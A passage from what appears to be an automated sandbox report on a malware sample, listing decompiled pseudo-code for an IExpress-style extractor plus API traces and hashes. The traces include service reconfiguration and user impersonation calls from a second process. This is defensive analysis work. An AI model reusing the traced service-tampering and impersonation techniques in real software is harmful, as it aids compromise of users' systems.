                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xa68004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa68004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xa68008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A67182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00A67191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A6719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00A671A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00A671B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 1ad7424392a75912f1d21d9baba6ec76f51b4e2dcf35e0542188de7b29dd7777
                                                                                                                                                                                                      • Instruction ID: 55b855e4270e48f926aba1f1d19e3972842110de4e2239a7d4ff089fc084c298
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ad7424392a75912f1d21d9baba6ec76f51b4e2dcf35e0542188de7b29dd7777
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F114C71D11208EFCB10DFF8DA48A9EB7F8EF19314F614A56D806E7210EA749A058F41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E00A663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E00A61781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      				E00A6658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xa69124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xa69124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A6647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A663EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-3249786385
                                                                                                                                                                                                      • Opcode ID: 881693874657ae10f59829bcb414264af6cd56285d57ffea26db584662d0fe76
                                                                                                                                                                                                      • Instruction ID: 4123b9f6ca4fe3ad2f5d1ae48358db846ea180c95c28a88d7487e7a68fbf2e35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 881693874657ae10f59829bcb414264af6cd56285d57ffea26db584662d0fe76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0221D271A00218ABDB20DF65DC85FEB777CEB55314F1042A9F595A3280DFB06D858FA4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A6369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00A636CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: 445923c8561c2119ce2cc0b7e23f1b37ae6d98f3e08cbcabdf41f17296796c0e
                                                                                                                                                                                                      • Instruction ID: aa34f0ffeae6ffe9c424048093cb84eca718f6c0c6ca98c26cd19ac5e92f5db7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 445923c8561c2119ce2cc0b7e23f1b37ae6d98f3e08cbcabdf41f17296796c0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01677790025577DF308BE69C48EEB76BCEBC6F10F140219F915F2180D5A5D646CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00A66517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xa69a3c; // 0xa60000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E00A644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t24 = _a16;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1214682469-0
                                                                                                                                                                                                      • Opcode ID: 8bc55f8e874c1c31f0d7ca9787c15c8612d57fd473a90122b35701f40ec35690
                                                                                                                                                                                                      • Instruction ID: bdd58da54538bbe006e6afe509ce82151eb4031c6e6f0fe157af90b56cb10583
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bc55f8e874c1c31f0d7ca9787c15c8612d57fd473a90122b35701f40ec35690
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE01F972100615BBDB10AFE99C49DBB7A7CEBD9761F010125FE16E3190DBB1CD11CAA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E00A665E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A62B33), ref: 00A66602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00A66612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00A66629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00A66635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: a0240de5cea298690bcfeb701b0081d1d1b4eab23ae9d37aa514310825652345
                                                                                                                                                                                                      • Instruction ID: 8c852389fc8d52808e63efb4fdfe313c39cb75bbb47484c2ada6f62851bbf737
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0240de5cea298690bcfeb701b0081d1d1b4eab23ae9d37aa514310825652345
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF02D350041906ED7365B68EC888B7BFBCDF97354B19026FE491A2001D6550D078A61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A669B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xa681f8 = E00A66C70();
                                                                                                                                                                                                      				__set_app_type(E00A66FBE(2));
                                                                                                                                                                                                      				 *0xa688a4 =  *0xa688a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xa688a8 =  *0xa688a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xa68528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xa6851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E00A67000();
                                                                                                                                                                                                      				if( *0xa68000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E00A67000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A671EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A66FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A66FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00A669C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00A669D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00A669E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 00A66A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 4bd6a1fee66f377af9c3cbb3777101efc8ea47d8222e7421ee09477bab9b17fd
                                                                                                                                                                                                      • Instruction ID: 840393ea448e18eb2dc733fae152fc29a3c13b24dcc38316c164d823aa4e4ca1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd6a1fee66f377af9c3cbb3777101efc8ea47d8222e7421ee09477bab9b17fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F01CB01983018FC715EFB0EE1A6583BB5FB15335B110719E462962F0CFBE8542CE11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph for 7ff9a5dc1a1d omitted; API calls shown in the graph: ControlService, ChangeServiceConfigA]
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Service$ChangeConfigControl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1778205439-0
                                                                                                                                                                                                      • Opcode ID: 996017712eb69f27c480e3afef94288e3b1dc58b6966fecae74c1b18da540475
                                                                                                                                                                                                      • Instruction ID: e1e4f0861e58d10ae6c4ce1ef86e16eb6aaa4c85493bf3efe847b29add94ce18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996017712eb69f27c480e3afef94288e3b1dc58b6966fecae74c1b18da540475
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7120830A18A4D4FDB68DF68D8467F977E0FB55710F00427EE89EC3291DB74A9858B82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                      • Opcode ID: 675ff21a098e1e01b26e31ec85d7495383a378355dfcd5d1006c4eac5c1e739a
                                                                                                                                                                                                      • Instruction ID: cc846213abe6ac3196e7350620092567843448d33e5bf9c993c0eca765413595
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ff21a098e1e01b26e31ec85d7495383a378355dfcd5d1006c4eac5c1e739a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C917130618A4D8FEBA8EF28D8557E977E1FF59300F00813AD88DC7292DB74A545CB82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2216092060-0
                                                                                                                                                                                                      • Opcode ID: 11cebabd2b2586501dbc67490ac2a5b20574ff20965171b81160d87ccd3c23ad
                                                                                                                                                                                                      • Instruction ID: 8312a5f08f67357e649ea0db10896903be1d303633040649807c3c2596a6f934
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11cebabd2b2586501dbc67490ac2a5b20574ff20965171b81160d87ccd3c23ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67A1F231A0DB884FDB59DBB898556F97BE1EF57311F0442BFD089C3293CA686809CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph for 7ff9a5dc0c34 omitted; API call shown in the graph: OpenServiceA]
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenService
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3098006287-0
                                                                                                                                                                                                      • Opcode ID: a57386d97c913029ffaf78abbccb1680eb617315e29cb6cb19a14e508e94cf24
                                                                                                                                                                                                      • Instruction ID: 85b3fe1d5d0064a776d59f2d2a4b4d4a229dd527058aafd3924ba79198a1e733
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a57386d97c913029ffaf78abbccb1680eb617315e29cb6cb19a14e508e94cf24
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C51C734518A4D4FDB58EF28D8467F97BE1FB59311F10412EE85EC3292DE74E8458B81
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph for 7ff9a5dc0b2d omitted; API call shown in the graph: OpenSCManagerW]
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ManagerOpen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1889721586-0
                                                                                                                                                                                                      • Opcode ID: b01bf33ec24dd48d36ac41ac43179d73e081739e5379fa0c3e609751a8468359
                                                                                                                                                                                                      • Instruction ID: a7a05fc2af0a128b3c8592f3ad32a31a0de6cad86f83f104ee80115ee3c1b892
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b01bf33ec24dd48d36ac41ac43179d73e081739e5379fa0c3e609751a8468359
